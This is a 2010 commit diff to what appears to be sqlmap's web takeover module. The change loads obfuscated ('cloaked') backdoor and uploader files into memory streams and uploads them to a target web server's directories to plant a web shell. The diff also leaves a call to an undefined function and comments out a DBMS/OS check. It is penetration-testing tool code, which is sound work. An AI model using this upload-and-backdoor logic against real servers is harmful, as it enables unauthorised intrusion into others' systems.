modified a way to handle shell scripts

2025-02-03 05:04:11 +03:00 · 2010-01-27 13:59:25 +00:00 · 2010-01-27 13:59:25 +00:00 · e63428207c
commit e63428207c
parent f91687c4f7
1 changed files with 15 additions and 7 deletions
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

 import os
 import re
+import StringIO

 from lib.core.agent import agent
 from lib.core.common import fileToStr
@ -37,6 +38,7 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.shell import autoCompletion
+from extra.cloak.cloak import decloak
 from lib.request.connect import Connect as Request


@ -74,10 +76,13 @@ class Web:
        return output

    def webFileUpload(self, fileToUpload, destFileName, directory):
+        webStreamUpload(self, open(fileToUpload, "r"), destFileName, directory)
+        
+    def webFileStreamUpload(self, stream, destFileName, directory):
        if self.webApi == "php":
            multipartParams = {
                                "upload":    "1",
-                                "file":      open(fileToUpload, "r"),
+                                "file":      stream,
                                "uploadDir": directory,
                              }
            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
@ -90,7 +95,7 @@ class Web:
        elif self.webApi == "asp":
            backdoorRemotePath = "%s/%s" % (directory, destFileName)
            backdoorRemotePath = os.path.normpath(backdoorRemotePath)
-            backdoorContent = open(fileToUpload, "r").read()
+            backdoorContent = stream.read()
            postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
            page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)

@ -111,7 +116,7 @@ class Web:
        if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None:
            return

-        self.checkDbmsOs()
+        #self.checkDbmsOs()

        kb.docRoot  = getDocRoot()
        directories = getDirs()
@ -150,10 +155,13 @@ class Web:
                logger.warn("invalid value, it must be 1 or 3")

        backdoorName = "backdoor.%s" % self.webApi
-        backdoorPath = os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName)
+        backdoorStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
+        
        uploaderName = "uploader.%s" % self.webApi
-        uploaderStr  = fileToStr(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName))
-
+        uploaderStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_')))
+        
+        uploaderStr  = uploaderStream.read()
+        
        for directory in directories:
            # Upload the uploader agent
            outFile     = os.path.normpath("%s/%s" % (directory, uploaderName))
@ -182,7 +190,7 @@ class Web:
            infoMsg += "on '%s'" % directory
            logger.info(infoMsg)

-            self.webFileUpload(backdoorPath, backdoorName, directory)
+            self.webFileStreamUpload(backdoorStream, backdoorName, directory)
            self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
            self.webDirectory = directory